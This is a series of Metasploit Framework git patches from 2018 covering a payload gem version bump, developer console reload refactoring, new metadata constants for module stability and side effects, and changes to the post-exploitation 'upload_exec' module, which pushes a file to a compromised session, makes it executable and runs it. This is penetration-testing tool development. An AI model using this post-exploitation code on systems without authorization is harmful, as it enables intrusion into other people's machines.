540955f488e100d2247198c7c63b016d93a705d7 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 25 Sep 2018 11:09:46 -0500 Subject: [PATCH 063/192] Update metasploit-payloads to 1.3.51 --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 05c7bb2d48..f997c6317c 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -18,7 +18,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.47) + metasploit-payloads (= 1.3.51) metasploit_data_models metasploit_payloads-mettle (= 0.4.2) mqtt @@ -164,7 +164,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.47) + metasploit-payloads (1.3.51) metasploit_data_models (3.0.0) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index f0cc7d106a..7714ef792f 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.47' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.51' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.4.2' # Needed by msfgui and other rpc components From 0b48d2371de360c66ecdcca0dfebb67386b15ecc Mon Sep 17 00:00:00 2001 From: Erin Bleiweiss Date: Wed, 26 Sep 2018 17:32:40 -0500 Subject: [PATCH 064/192] Add error handling for non-git situations --- lib/msf/ui/console/command_dispatcher/developer.rb | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index 3762949a5b..34af8f028c 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -221,7 +221,12 @@ class Msf::Ui::Console::CommandDispatcher::Developer end def cmd_reload_diff_files - files = %x(git diff --name-only).split + output = %x(git diff --name-only 2>&1) + if output.include?('Not a git repository') + print_error 'No git repository found.' + return + end + files = output.split files.each do | file | reload_file(file) end From 04ff0931d769354c8a37f60f6c2aa85adb4b48d2 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Wed, 26 Sep 2018 17:42:54 -0500 Subject: [PATCH 065/192] Add metadata place holders for reliability/side-effects/stability --- lib/msf/core/constants.rb | 43 +++++++++++++++++++ lib/msf/core/module.rb | 6 +++ lib/msf/core/module/reliability.rb | 14 ++++++ lib/msf/core/module/side_effects.rb | 15 +++++++ lib/msf/core/module/stability.rb | 15 +++++++ lib/msf/core/modules/metadata/obj.rb | 6 +++ .../auxiliary/admin/ms/ms08_059_his2006.rb | 5 +++ 7 files changed, 104 insertions(+) create mode 100644 lib/msf/core/module/reliability.rb create mode 100644 lib/msf/core/module/side_effects.rb create mode 100644 lib/msf/core/module/stability.rb diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb index bb75269ef7..8799bf6e40 100644 --- a/lib/msf/core/constants.rb +++ b/lib/msf/core/constants.rb @@ -49,6 +49,49 @@ RankingName = ExcellentRanking => "excellent" } +# +# Stability traits +# + +# Module does not crash the service +CRASH_SAFE = 'crash-safe' +# Module crashes service, but service restarts. +CRASH_SERVICE_RESTARTS = 'crash-service-restarts' +# Module crashes service, and service remains down. +CRASH_SERVICE_DEAD = 'crash-service-dead' +# Module crashes the OS, but OS restarts. +CRASH_OS_RESTARTS = 'crash-os-restarts' +# Module crashes the OS, and OS remains down. +CRASH_OS_DEAD = 'crash-os-dead' +# Module causes a resource (such as a file or data in database) to be unavailable for the service. +SERVICE_RESOURCE_LOSS = 'service-resource-loss' +# Modules causes a resource (such as a file) to be unavailable for the OS. +OS_RESOURCE_LOSS = 'os-resource-loss' + +# +# Side-effect traits +# + +# Modules leaves payload or a dropper on the target machine +PAYLOAD_ON_DISK = 'payload-on-disk' +# Module modifies some config file on the target machine +CONFIG_CHANGES = 'config-changes' +# Module leaves attack traces in a log file (Example: SQL injection data found in HTTP log) +MALICIOUS_INPUT_IN_LOG = 'malicious-input-in-log' +# Module may cause account lockouts (likely due to brute-forcing) +LOCKOUTS = 'lockouts' +# Module may show something on the screen (Example: a window pops up) +SCREEN_EFFECTS = 'screen-effects' + +# +# Reliability +# + +# The module is expected to work at first attempt +FIRST_ATTEMPT_SUCCESS = 'first-attempt-success' +# The module is expected to get a shell every time it fires +REPEATABLE = 'repeatable' + module HttpClients IE = "MSIE" FF = "Firefox" diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index a6e274f9aa..71fbf82fc0 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -39,6 +39,9 @@ class Module autoload :Type, 'msf/core/module/type' autoload :UI, 'msf/core/module/ui' autoload :UUID, 'msf/core/module/uuid' + autoload :SideEffects, 'msf/core/module/side_effects' + autoload :Stability, 'msf/core/module/stability' + autoload :Reliability, 'msf/core/module/reliability' include Msf::Module::Arch include Msf::Module::Auth @@ -56,6 +59,9 @@ class Module include Msf::Module::Type include Msf::Module::UI include Msf::Module::UUID + include Msf::Module::SideEffects + include Msf::Module::Stability + include Msf::Module::Reliability # The key where a comma-separated list of Ruby module names will live in the # datastore, consumed by #replicant to allow clean override of MSF module methods. diff --git a/lib/msf/core/module/reliability.rb b/lib/msf/core/module/reliability.rb new file mode 100644 index 0000000000..53d4a830ab --- /dev/null +++ b/lib/msf/core/module/reliability.rb @@ -0,0 +1,14 @@ +module Msf::Module::Reliability + extend ActiveSupport::Concern + + module ClassMethods + def reliability + instance = self.new + instance.notes['Reliability'] ? instance.notes['Reliability'] : [] + end + end + + def reliability + self.class.reliability + end +end \ No newline at end of file diff --git a/lib/msf/core/module/side_effects.rb b/lib/msf/core/module/side_effects.rb new file mode 100644 index 0000000000..e0acb3e974 --- /dev/null +++ b/lib/msf/core/module/side_effects.rb @@ -0,0 +1,15 @@ +module Msf::Module::SideEffects + extend ActiveSupport::Concern + + module ClassMethods + def side_effects + instance = self.new + instance.notes['SideEffects'] ? instance.notes['SideEffects'] : [] + end + end + + def side_effects + self.class.side_effects + end + +end diff --git a/lib/msf/core/module/stability.rb b/lib/msf/core/module/stability.rb new file mode 100644 index 0000000000..21c5fbe5ed --- /dev/null +++ b/lib/msf/core/module/stability.rb @@ -0,0 +1,15 @@ +module Msf::Module::Stability + extend ActiveSupport::Concern + + module ClassMethods + def stability + instance = self.new + instance.notes['Stability'] ? instance.notes['Stability'] : [] + end + end + + def stability + self.class.stability + end + +end \ No newline at end of file diff --git a/lib/msf/core/modules/metadata/obj.rb b/lib/msf/core/modules/metadata/obj.rb index 870548ecfb..29316a720f 100644 --- a/lib/msf/core/modules/metadata/obj.rb +++ b/lib/msf/core/modules/metadata/obj.rb @@ -51,6 +51,12 @@ class Obj attr_reader :default_credential # @return [Hash] attr_reader :notes + # @return [Hash] + attr_reader :side_effects + # @return [Hash] + attr_reader :stability + # @return [Hash] + attr_reader :reliability def initialize(module_instance, obj_hash = nil) unless obj_hash.nil? diff --git a/modules/auxiliary/admin/ms/ms08_059_his2006.rb b/modules/auxiliary/admin/ms/ms08_059_his2006.rb index 39ec949018..7b0712b00c 100644 --- a/modules/auxiliary/admin/ms/ms08_059_his2006.rb +++ b/modules/auxiliary/admin/ms/ms08_059_his2006.rb @@ -25,6 +25,11 @@ class MetasploitModule < Msf::Auxiliary [ 'OSVDB', '49068' ], [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745' ], ], + 'Notes' => + { + 'Reliability' => [ FIRST_ATTEMPT_SUCCESS, REPEATABLE], + 'SideEffects' => [ FILE_ON_DISK, TRACES_IN_LOGS] + }, 'DisclosureDate' => 'Oct 14 2008')) register_options( From f8984c4f9b7463848afe20ab5013454bd5a55bd7 Mon Sep 17 00:00:00 2001 From: Erin Bleiweiss Date: Wed, 26 Sep 2018 17:55:43 -0500 Subject: [PATCH 066/192] Rename function, change args from to --- .../console/command_dispatcher/developer.rb | 34 ++++++++++--------- 1 file changed, 18 insertions(+), 16 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index 34af8f028c..cb0607e6e7 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -51,6 +51,18 @@ class Msf::Ui::Console::CommandDispatcher::Developer load path end + def reload_diff_files + output = %x(git diff --name-only 2>&1) + if output.include?('Not a git repository') + print_error 'No git repository found.' + return + end + files = output.split("\n") + files.each do | file | + reload_file(file) + end + end + def cmd_irb_help print_line "Usage: irb" print_line @@ -192,10 +204,12 @@ class Msf::Ui::Console::CommandDispatcher::Developer end def cmd_reload_lib_help - print_line 'Usage: reload_lib lib/to/reload.rb [...] [diff]' + print_line 'Usage: reload_lib lib/to/reload.rb [...]' print_line print_line 'Reload one or more library files from specified paths.' - print_line 'Use the argument \'diff\' to reload all changed files in your current git working tree.' + print_line + print_line 'OPTIONS:' + print_line ' -a, --all Reload all changed files in your current git working tree.' end # @@ -205,8 +219,8 @@ class Msf::Ui::Console::CommandDispatcher::Developer if args.empty? || args.include?('-h') || args.include?('--help') cmd_reload_lib_help return - elsif args.include?('diff') - cmd_reload_diff_files + elsif args.include?('-a') || args.include?('--all') + reload_diff_files return end @@ -220,18 +234,6 @@ class Msf::Ui::Console::CommandDispatcher::Developer tab_complete_filenames(str, words) end - def cmd_reload_diff_files - output = %x(git diff --name-only 2>&1) - if output.include?('Not a git repository') - print_error 'No git repository found.' - return - end - files = output.split - files.each do | file | - reload_file(file) - end - end - def cmd_log_help print_line 'Usage: log' print_line From 71cb3e8e94ab226a57ad6d0b06ad1b54e9761b86 Mon Sep 17 00:00:00 2001 From: Erin Bleiweiss Date: Wed, 26 Sep 2018 18:08:46 -0500 Subject: [PATCH 067/192] Use OptionParser --- .../console/command_dispatcher/developer.rb | 31 +++++++++++-------- 1 file changed, 18 insertions(+), 13 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index cb0607e6e7..d5d4763591 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -204,27 +204,32 @@ class Msf::Ui::Console::CommandDispatcher::Developer end def cmd_reload_lib_help - print_line 'Usage: reload_lib lib/to/reload.rb [...]' - print_line - print_line 'Reload one or more library files from specified paths.' - print_line - print_line 'OPTIONS:' - print_line ' -a, --all Reload all changed files in your current git working tree.' + cmd_reload_lib '-h' end # # Reload one or more library files from specified paths # def cmd_reload_lib(*args) - if args.empty? || args.include?('-h') || args.include?('--help') - cmd_reload_lib_help - return - elsif args.include?('-a') || args.include?('--all') - reload_diff_files - return + + opts = OptionParser.new do |opts| + opts.banner = 'Usage: reload_lib lib/to/reload.rb [...]' + opts.separator 'Reload one or more library files from specified paths.' + opts.separator '' + + opts.on '-h', '--help', 'Help banner.' do + return print(opts.help) + end + + opts.on '-a', '--all', 'Reload all changed files in your current git working tree.' do + reload_diff_files + return + end + end - args.each { |path| reload_file(path) } + rest = opts.order(args) + rest.each { |path| reload_file(path) } end # From 173f57081297ed3f593b150b4e8e3203622c0c6d Mon Sep 17 00:00:00 2001 From: Erin Bleiweiss Date: Wed, 26 Sep 2018 18:29:49 -0500 Subject: [PATCH 068/192] Check for presence of git directory --- lib/msf/ui/console/command_dispatcher/developer.rb | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index d5d4763591..2028b07691 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -26,6 +26,10 @@ class Msf::Ui::Console::CommandDispatcher::Developer } end + def git? + File.directory?(File.join(Msf::Config.install_root, ".git")) + end + def local_editor framework.datastore['LocalEditor'] || Rex::Compat.getenv('VISUAL') || Rex::Compat.getenv('EDITOR') end @@ -52,12 +56,11 @@ class Msf::Ui::Console::CommandDispatcher::Developer end def reload_diff_files - output = %x(git diff --name-only 2>&1) - if output.include?('Not a git repository') + unless git? print_error 'No git repository found.' return end - files = output.split("\n") + files = %x(git diff --name-only).split("\n") files.each do | file | reload_file(file) end From 79c26bce0818b900ba22e12f3d62031d78638606 Mon Sep 17 00:00:00 2001 From: Erin Bleiweiss Date: Wed, 26 Sep 2018 18:32:52 -0500 Subject: [PATCH 069/192] Add a more comprehensive git check --- lib/msf/ui/console/command_dispatcher/developer.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/developer.rb b/lib/msf/ui/console/command_dispatcher/developer.rb index 2028b07691..77b5178d73 100644 --- a/lib/msf/ui/console/command_dispatcher/developer.rb +++ b/lib/msf/ui/console/command_dispatcher/developer.rb @@ -27,7 +27,7 @@ class Msf::Ui::Console::CommandDispatcher::Developer end def git? - File.directory?(File.join(Msf::Config.install_root, ".git")) + File.directory?(File.join(Msf::Config.install_root, ".git")) && Msf::Util::Helper.which("git") end def local_editor From 1df6c43b12c46d5d40a0e33fdb8e32e5eaa988ae Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 21 Sep 2018 00:57:06 -0500 Subject: [PATCH 070/192] Add ARGS and TIMEOUT options to upload_exec Credit to @bcoles for the initial patch. --- modules/post/multi/manage/upload_exec.rb | 33 +++++++++++++++++------- 1 file changed, 24 insertions(+), 9 deletions(-) diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb index 5dedd2a8d2..11e88b644b 100644 --- a/modules/post/multi/manage/upload_exec.rb +++ b/modules/post/multi/manage/upload_exec.rb @@ -18,8 +18,10 @@ class MetasploitModule < Msf::Post register_options( [ - OptPath.new('LPATH', [true,'Local file path to upload and execute']), - OptString.new('RPATH', [false,'Remote file path on target (default is basename of LPATH)']), + OptPath.new('LPATH', [true, 'Local file path to upload and execute']), + OptString.new('RPATH', [false, 'Remote file path on target (default is basename of LPATH)']), + OptString.new('ARGS', [false, 'Command-line arguments to pass to the uploaded file']), + OptInt.new('TIMEOUT', [true, 'Timeout for command execution', 0]) ]) end @@ -33,6 +35,14 @@ class MetasploitModule < Msf::Post remote_name end + def args + datastore['ARGS'] + end + + def timeout + datastore['TIMEOUT'] + end + def lpath datastore['LPATH'] end @@ -40,19 +50,24 @@ class MetasploitModule < Msf::Post def run upload_file(rpath, lpath) - if session.platform.include?("windows") - cmd_exec("cmd.exe /c start #{rpath}", nil, 0) + if session.platform.include?('windows') + cmd_exec("cmd.exe /c start #{rpath}", args, timeout) else - cmd = "chmod 700 #{rpath} && " - # Handle absolute paths if rpath.start_with?('/') - cmd << rpath + cmd = rpath else - cmd << "./#{rpath}" + cmd = "./#{rpath}" end - cmd_exec(cmd, nil, 0) + if session.type == 'meterpreter' + # client is an alias for session + client.fs.file.chmod(rpath, 0700) + else + cmd_exec("chmod 700 #{rpath}") + end + + cmd_exec(cmd, args, timeout) end rm_f(rpath) From 410abdca8069922d21e3f642a1000abb588c3c6e Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 21 Sep 2018 02:17:54 -0500 Subject: [PATCH 071/192] Tweak TIMEOUT to match cmd_exec's default --- modules/post/multi/manage/upload_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb index 11e88b644b..f72af815e7 100644 --- a/modules/post/multi/manage/upload_exec.rb +++ b/modules/post/multi/manage/upload_exec.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Post OptPath.new('LPATH', [true, 'Local file path to upload and execute']), OptString.new('RPATH', [false, 'Remote file path on target (default is basename of LPATH)']), OptString.new('ARGS', [false, 'Command-line arguments to pass to the uploaded file']), - OptInt.new('TIMEOUT', [true, 'Timeout for command execution', 0]) + OptInt.new('TIMEOUT', [true, 'Timeout for command execution', 15]) ]) end From d5f5ef103ff9bd62af6e2146113c0f7affdd717d Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 21 Sep 2018 16:42:14 -0500 Subject: [PATCH 072/192] Refactor everything and add command output --- modules/post/multi/manage/upload_exec.rb | 95 +++++++++++------------- 1 file changed, 43 insertions(+), 52 deletions(-) diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb index f72af815e7..f29c5b0678 100644 --- a/modules/post/multi/manage/upload_exec.rb +++ b/modules/post/multi/manage/upload_exec.rb @@ -6,33 +6,54 @@ class MetasploitModule < Msf::Post include Msf::Post::File - def initialize(info={}) - super( update_info( info, - 'Name' => 'Upload and Execute', - 'Description' => %q{ Push a file and execute it }, - 'License' => MSF_LICENSE, - 'Author' => [ 'egypt'], - 'Platform' => [ 'win','linux','osx' ], - 'SessionTypes' => [ 'meterpreter','shell' ] + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Upload and Execute', + 'Description' => %q{Push a file and execute it.}, + 'Author' => 'egypt', + 'License' => MSF_LICENSE, + 'Platform' => ['win', 'unix', 'linux', 'osx'], + 'SessionTypes' => ['meterpreter', 'shell'] )) - register_options( - [ - OptPath.new('LPATH', [true, 'Local file path to upload and execute']), - OptString.new('RPATH', [false, 'Remote file path on target (default is basename of LPATH)']), - OptString.new('ARGS', [false, 'Command-line arguments to pass to the uploaded file']), - OptInt.new('TIMEOUT', [true, 'Timeout for command execution', 15]) - ]) + register_options([ + OptPath.new('LPATH', [true, 'Local file path to upload and execute']), + OptString.new('RPATH', [false, 'Remote file path on target (default is basename of LPATH)']), + OptString.new('ARGS', [false, 'Command-line arguments to pass to the uploaded file']), + OptInt.new('TIMEOUT', [true, 'Timeout for command execution', 15]) + ]) + end + + def run + upload_file(rpath, lpath) + + if session.platform == 'windows' + cmd = "cmd.exe /c start #{rpath}" + else + # Handle absolute paths + cmd = rpath.start_with?('/') ? rpath : "./#{rpath}" + end + + begin + # client is an alias for session + client.fs.file.chmod(rpath, 0700) + rescue + # Fall back if unimplemented or unavailable + cmd_exec("chmod 700 #{rpath}") + end + + output = cmd_exec(cmd, args, timeout) + vprint_good(output) unless output.blank? + + rm_f(rpath) + end + + def lpath + datastore['LPATH'] end def rpath - if datastore['RPATH'].blank? - remote_name = File.basename(datastore['LPATH']) - else - remote_name = datastore['RPATH'] - end - - remote_name + datastore['RPATH'].blank? ? File.basename(lpath) : datastore['RPATH'] end def args @@ -42,34 +63,4 @@ class MetasploitModule < Msf::Post def timeout datastore['TIMEOUT'] end - - def lpath - datastore['LPATH'] - end - - def run - upload_file(rpath, lpath) - - if session.platform.include?('windows') - cmd_exec("cmd.exe /c start #{rpath}", args, timeout) - else - # Handle absolute paths - if rpath.start_with?('/') - cmd = rpath - else - cmd = "./#{rpath}" - end - - if session.type == 'meterpreter' - # client is an alias for session - client.fs.file.chmod(rpath, 0700) - else - cmd_exec("chmod 700 #{rpath}") - end - - cmd_exec(cmd, args, timeout) - end - - rm_f(rpath) - end end From dc1fddd31eda3ff83148187928a108f09bd88496 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 21 Sep 2018 17:27:42 -0500 Subject: [PATCH 073/192] Move chmod so Windows doesn't do it --- modules/post/multi/manage/upload_exec.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb index f29c5b0678..06b1ec6437 100644 --- a/modules/post/multi/manage/upload_exec.rb +++ b/modules/post/multi/manage/upload_exec.rb @@ -30,18 +30,18 @@ class MetasploitModule < Msf::Post if session.platform == 'windows' cmd = "cmd.exe /c start #{rpath}" else + begin + # client is an alias for session + client.fs.file.chmod(rpath, 0700) + rescue + # Fall back if unimplemented or unavailable + cmd_exec("chmod 700 #{rpath}") + end + # Handle absolute paths cmd = rpath.start_with?('/') ? rpath : "./#{rpath}" end - begin - # client is an alias for session - client.fs.file.chmod(rpath, 0700) - rescue - # Fall back if unimplemented or unavailable - cmd_exec("chmod 700 #{rpath}") - end - output = cmd_exec(cmd, args, timeout) vprint_good(output) unless output.blank? From 40f19efe2c7adb80aaf566785ff981a9e229f4c1 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 21 Sep 2018 17:48:25 -0500 Subject: [PATCH 074/192] Don't use cmd.exe /c start so we can fetch output --- modules/post/multi/manage/upload_exec.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb index 06b1ec6437..4e5df4148a 100644 --- a/modules/post/multi/manage/upload_exec.rb +++ b/modules/post/multi/manage/upload_exec.rb @@ -28,7 +28,8 @@ class MetasploitModule < Msf::Post upload_file(rpath, lpath) if session.platform == 'windows' - cmd = "cmd.exe /c start #{rpath}" + # Don't use cmd.exe /c start so we can fetch output + cmd = rpath else begin # client is an alias for session From 42fab6266d2f32f70835610db95de2b578b18731 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 21 Sep 2018 17:54:27 -0500 Subject: [PATCH 075/192] Prefer vprint_line for better formatting --- modules/post/multi/manage/upload_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb index 4e5df4148a..73158d3f88 100644 --- a/modules/post/multi/manage/upload_exec.rb +++ b/modules/post/multi/manage/upload_exec.rb @@ -44,7 +44,7 @@ class MetasploitModule < Msf::Post end output = cmd_exec(cmd, args, timeout) - vprint_good(output) unless output.blank? + vprint_line(output) unless output.blank? rm_f(rpath) end From 6dd6e8abcb9db885b3258afbf36edf7efa284b1c Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 21 Sep 2018 18:14:46 -0500 Subject: [PATCH 076/192] Change vprint to print because we test output Fewer surprises this way when people don't set VERBOSE. --- modules/post/multi/manage/upload_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb index 73158d3f88..5ccfd391f7 100644 --- a/modules/post/multi/manage/upload_exec.rb +++ b/modules/post/multi/manage/upload_exec.rb @@ -44,7 +44,7 @@ class MetasploitModule < Msf::Post end output = cmd_exec(cmd, args, timeout) - vprint_line(output) unless output.blank? + print_line(output) unless output.blank? rm_f(rpath) end From a119465495b45afe4f29908f13aea5898f6f079a Mon Sep 17 00:00:00 2001 From: William Vu Date: Sun, 23 Sep 2018 21:52:46 -0500 Subject: [PATCH 077/192] Tell the user when there's blank output --- modules/post/multi/manage/upload_exec.rb | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb index 5ccfd391f7..992d825bde 100644 --- a/modules/post/multi/manage/upload_exec.rb +++ b/modules/post/multi/manage/upload_exec.rb @@ -44,7 +44,12 @@ class MetasploitModule < Msf::Post end output = cmd_exec(cmd, args, timeout) - print_line(output) unless output.blank? + + if output.blank? + vprint_status('Command returned no output') + else + print_line(output) + end rm_f(rpath) end From 81d020f8104af12b8c2cf502b62443c59c965ee6 Mon Sep 17 00:00:00 2001 From: William Vu Date: Sun, 23 Sep 2018 22:12:26 -0500 Subject: [PATCH 078/192] Add a couple more Unix platforms This is so we don't trigger the session compatibility warning. These platforms have been worked on most recently. --- modules/post/multi/manage/upload_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb index 992d825bde..823fc0976f 100644 --- a/modules/post/multi/manage/upload_exec.rb +++ b/modules/post/multi/manage/upload_exec.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Post 'Description' => %q{Push a file and execute it.}, 'Author' => 'egypt', 'License' => MSF_LICENSE, - 'Platform' => ['win', 'unix', 'linux', 'osx'], + 'Platform' => ['win', 'unix', 'linux', 'osx', 'bsd', 'solaris'], 'SessionTypes' => ['meterpreter', 'shell'] )) From 4adca52103a236a02a8e7beb1dfa80d3e1fc2292 Mon Sep 17 00:00:00 2001 From: Tim W Date: Mon, 24 Sep 2018 15:23:44 +0800 Subject: [PATCH 079/192] create chmod helper function --- lib/msf/core/post/file.rb | 12 ++++++++++++ modules/post/multi/manage/upload_exec.rb | 8 +------- 2 files changed, 13 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index 8cbe7640c0..21768ca652 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -361,6 +361,18 @@ module Msf::Post::File write_file(remote, ::File.read(local)) end + # + # Sets the executable permissions on a remote file + # + # @param remote [String] Destination file name on the remote filesystem + def chmod_x_file(remote) + if session.type == "meterpreter" and session.commands.include?('stdapi_fs_chmod') + session.fs.file.chmod(remote, 0700) + else + cmd_exec("chmod 700 \"#{remote}\"") + end + end + # # Delete remote files # diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb index 823fc0976f..4e5630cde9 100644 --- a/modules/post/multi/manage/upload_exec.rb +++ b/modules/post/multi/manage/upload_exec.rb @@ -31,13 +31,7 @@ class MetasploitModule < Msf::Post # Don't use cmd.exe /c start so we can fetch output cmd = rpath else - begin - # client is an alias for session - client.fs.file.chmod(rpath, 0700) - rescue - # Fall back if unimplemented or unavailable - cmd_exec("chmod 700 #{rpath}") - end + chmod_x_file(rpath) # Handle absolute paths cmd = rpath.start_with?('/') ? rpath : "./#{rpath}" From 896dd13bbe33ae247089b25554f76055b0dc3cd5 Mon Sep 17 00:00:00 2001 From: Tim W Date: Mon, 24 Sep 2018 15:48:41 +0800 Subject: [PATCH 080/192] && instead of and --- lib/msf/core/post/file.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index 21768ca652..824752d47e 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -366,7 +366,7 @@ module Msf::Post::File # # @param remote [String] Destination file name on the remote filesystem def chmod_x_file(remote) - if session.type == "meterpreter" and session.commands.include?('stdapi_fs_chmod') + if session.type == "meterpreter" && session.commands.include?('stdapi_fs_chmod') session.fs.file.chmod(remote, 0700) else cmd_exec("chmod 700 \"#{remote}\"") From 5444d7a1a539accd7871d98149ae3b85f1d626ac Mon Sep 17 00:00:00 2001 From: William Vu Date: Mon, 24 Sep 2018 12:37:15 -0500 Subject: [PATCH 081/192] Update chmod_x_file to chmod --- lib/msf/core/post/file.rb | 17 +++++++++++------ 1 file changed, 11 insertions(+), 6 deletions(-) diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index 824752d47e..c9cd6aa469 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -362,14 +362,19 @@ module Msf::Post::File end # - # Sets the executable permissions on a remote file + # Sets the permissions on a remote file # - # @param remote [String] Destination file name on the remote filesystem - def chmod_x_file(remote) - if session.type == "meterpreter" && session.commands.include?('stdapi_fs_chmod') - session.fs.file.chmod(remote, 0700) + # @param path [String] Path on the remote filesystem + # @param mode [Fixnum] Mode as an octal number + def chmod(path, mode = 0700) + if session.platform == 'windows' + raise "`chmod_x_file?' method does not support Windows systems" + end + + if session.type == 'meterpreter' && session.commands.include?('stdapi_fs_chmod') + session.fs.file.chmod(path, mode) else - cmd_exec("chmod 700 \"#{remote}\"") + cmd_exec("chmod #{mode.to_s(8)} '#{path}'") end end From 3bda794f00942e6d9074b771b980021086a2ee49 Mon Sep 17 00:00:00 2001 From: William Vu Date: Mon, 24 Sep 2018 12:40:18 -0500 Subject: [PATCH 082/192] Update upload_exec with chmod --- modules/post/multi/manage/upload_exec.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb index 4e5630cde9..e930fa690e 100644 --- a/modules/post/multi/manage/upload_exec.rb +++ b/modules/post/multi/manage/upload_exec.rb @@ -31,7 +31,8 @@ class MetasploitModule < Msf::Post # Don't use cmd.exe /c start so we can fetch output cmd = rpath else - chmod_x_file(rpath) + # Set 700 so only we can execute the file + chmod(rpath, 0700) # Handle absolute paths cmd = rpath.start_with?('/') ? rpath : "./#{rpath}" From bbfac2af1cdb66a2a488a97a9a95e05576ede691 Mon Sep 17 00:00:00 2001 From: William Vu Date: Mon, 24 Sep 2018 15:17:59 -0500 Subject: [PATCH 083/192] Fix copypasta typo --- lib/msf/core/post/file.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index c9cd6aa469..ea69578a79 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -368,7 +368,7 @@ module Msf::Post::File # @param mode [Fixnum] Mode as an octal number def chmod(path, mode = 0700) if session.platform == 'windows' - raise "`chmod_x_file?' method does not support Windows systems" + raise "`chmod' method does not support Windows systems" end if session.type == 'meterpreter' && session.commands.include?('stdapi_fs_chmod') From 0e2361d6758bd28ad626408f4d150a13d79526fd Mon Sep 17 00:00:00 2001 From: Erin Bleiweiss Date: Wed, 26 Sep 2018 18:49:07 -0500 Subject: [PATCH 084/192] 